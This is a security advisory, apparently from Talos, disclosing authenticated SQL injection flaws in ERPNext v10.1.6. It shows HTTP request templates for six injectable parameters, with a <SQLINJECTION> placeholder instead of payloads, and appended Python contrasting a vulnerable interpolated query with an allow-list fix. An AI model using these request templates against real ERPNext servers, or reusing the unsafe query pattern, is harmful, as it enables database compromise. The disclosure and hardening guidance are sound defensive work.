TALOS-2018-0560

ERPNext SQL Injection Vulnerabilities

2018-09-05 00:00:00
Talos Intelligence
www.talosintelligence.com

CVSS2: 6.5 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.001 Low
Percentile: 36.5%

Summary

Exploitable SQL injection vulnerabilities exist in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities; no special tools are required.

Tested Versions

ERPNext v10.1.6 (master)

Product URLs

https://erpnext.com/

CVSSv3 Score

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Details

The following parameters are vulnerable to SQL injection attacks:

CVE-2018-3882 - searchfield parameter

The searchfield parameter can be used to perform an SQL injection attack as shown below:

GET /?txt=a&searchfield=name<SQLINJECTION>&query=erpnext.controllers.queries.employee_query&doctype=Employee&cmd=frappe.desk.search.search_widget&_=1522110063950 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

CVE-2018-3883 - employee parameter

The employee parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 194
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

employee=EMP%2f0001<SQLINJECTION>&date=2018-03-07&leave_type=Leave+Without+Pay&consider_all_leaves_in_the_allocation_period=true&cmd=erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on

CVE-2018-3883 - sort_order parameter

The sort_order parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0&sort_by=projected_qty&sort_order=asc<SQLINJECTION>&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - sort_by parameter

The sort_by parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0&sort_by=projected_qty<SQLINJECTION>&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - start parameter

The start parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0<SQLINJECTION>&sort_by=projected_qty&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3885 - order_by parameter

The order_by parameter can be used to perform an SQL injection attack as shown below:

GET /?start=0&page_length=20&doctype=Customer&fields=[%22%60tabCustomer%60.%60name%60%22%2c%22%60tabCustomer%60.%60owner%60%22%2c%22%60tabCustomer%60.%60docstatus%60%22%2c%22%60tabCustomer%60.%60_user_tags%60%22%2c%22%60tabCustomer%60.%60_comments%60%22%2c%22%60tabCustomer%60.%60modified%60%22%2c%22%60tabCustomer%60.%60modified_by%60%22%2c%22%60tabCustomer%60.%60_assign%60%22%2c%22%60tabCustomer%60.%60_liked_by%60%22%2c%22%60tabCustomer%60.%60_seen%60%22%2c%22%60tabCustomer%60.%60customer_name%60%22%2c%22%60tabCustomer%60.%60image%60%22%2c%22%60tabCustomer%60.%60disabled%60%22%2c%22%60tabCustomer%60.%60customer_group%60%22%2c%22%60tabCustomer%60.%60territory%60%22%2c%22%60tabCustomer%60.%60customer_type%60%22]&filters=%5B%5D&order_by=<SQLINJECTION>&with_comment_count=true&user_settings=%7B%22updated_on%22%3A%22Tue+Mar+27+2018+01%3A08%3A06+GMT%2B0100%22%2C%22List%22%3A%7B%22filters%22%3A%5B%5D%2C%22order_by%22%3A%22%60tabCustomer%60.%60modified%60+desc%22%7D%2C%22last_view%22%3A%22List%22%7D&cmd=frappe.desk.reportview.get&_=1522108874124 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
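The sort_by, sort_order, start and order_by parameters above all land in the ORDER BY / LIMIT part of a query, which cannot be protected by parameter binding alone because those positions take identifiers and keywords rather than values. The example below is added here to show the defensive pattern; it is constructed code, not ERPNext or Frappe source, and the table layout, column names and the get_data-style argument list are assumptions.

```python
import re
import sqlite3

# Constructed example (not ERPNext/Frappe code): hardening the sort_by,
# sort_order and start arguments of a get_data-style dashboard query.
# Only these column names may be placed in ORDER BY; anything else is rejected.
ALLOWED_SORT_COLUMNS = {"projected_qty", "actual_qty", "item_code", "warehouse"}
ALLOWED_SORT_ORDERS = {"asc", "desc"}


def build_query_unsafe(item_code, start, sort_by, sort_order):
    """The vulnerable pattern: caller-supplied values are interpolated into the
    SQL text, so sort_by, sort_order and start become SQL syntax, not data."""
    return (
        "select item_code, warehouse, projected_qty from `tabBin` "
        "where item_code = '%s' order by %s %s limit 21 offset %s"
        % (item_code, sort_by, sort_order, start)
    )


def build_query_safe(item_code, start, sort_by, sort_order):
    """Hardened form: item_code and start are bound as parameters; sort_by and
    sort_order are checked against an allow-list before being interpolated,
    since ORDER BY cannot take a bound parameter; start must be a plain
    non-negative integer."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("invalid sort_by: %r" % sort_by)
    if sort_order.lower() not in ALLOWED_SORT_ORDERS:
        raise ValueError("invalid sort_order: %r" % sort_order)
    if not re.fullmatch(r"\d+", str(start)):
        raise ValueError("invalid start: %r" % start)
    sql = (
        "select item_code, warehouse, projected_qty from `tabBin` "
        "where item_code = ? order by %s %s limit 21 offset ?"
        % (sort_by, sort_order.lower())
    )
    return sql, (item_code, int(start))


def run_safe(item_code, start, sort_by, sort_order):
    """Run the hardened query against a small constructed in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table `tabBin` (item_code text, warehouse text, projected_qty real)")
    conn.executemany(
        "insert into `tabBin` values (?, ?, ?)",
        [("asdasd", "Stores", 5.0), ("asdasd", "WIP", 12.0), ("other", "Stores", 1.0)],
    )
    sql, params = build_query_safe(item_code, start, sort_by, sort_order)
    return conn.execute(sql, params).fetchall()
```

The same allow-list approach applies to the order_by parameter of a report view: accept only a known column and direction, never the raw string.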

Timeline

2018-04-12 - Vendor Disclosure
2018-09-05 - Public Release
